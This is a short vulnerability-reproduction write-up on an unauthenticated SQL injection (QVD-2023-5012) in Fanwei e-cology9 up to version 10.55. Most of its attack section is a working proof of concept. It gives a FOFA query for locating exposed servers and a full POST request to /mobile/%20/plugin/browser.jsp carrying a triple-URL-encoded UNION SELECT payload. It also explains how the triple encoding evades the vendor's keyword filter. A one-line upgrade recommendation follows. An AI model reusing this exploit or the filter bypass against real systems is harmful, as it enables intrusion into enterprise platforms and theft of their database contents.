Fanwei e-cology9 SQL injection vulnerability reappears【QVD-2023-5012】

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Product Introduction

​ e-cology, a pan-micro collaborative management application platform, is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, and data center functions. A large-scale collaborative management platform for enterprises.

2. Vulnerability overview

​ There is a SQL injection vulnerability in Fanwei e-cology9. Unauthenticated remote attackers can use this vulnerability to obtain sensitive database information, and further exploitation may lead to the target system being charged.

3. Scope of influence

Affected version

Fanwei e-cology9 <= 10.55

unaffected version

Fanwei e-cology9 >= 10.56

Fourth, reproduce the environment

FOFA: app="Panwei-Collaborative Business System"

5. Vulnerability recurrence

Access the vulnerable environment, burp captures packets and sends the Repeater module for use

PoC

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651


isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

Note: Three parameters need to be passed in in the POC
1. isDis must be 1
2. browserTypeId corresponds to the method
3. keyword is the injection point, and url encoding must be performed 3 times to escape Panwei’s filtering mechanism (Panwei’s blacklist mechanism will put keywords replaced by double-width characters)

Query database version information

Reproduced successfully

Dragon POC

6. Repair suggestions

At present, the official security patch has been released, and it is recommended that affected users upgrade to version 10.56 and above as soon as possible.

https://www.weaver.com.cn/cs/securityDownload.asp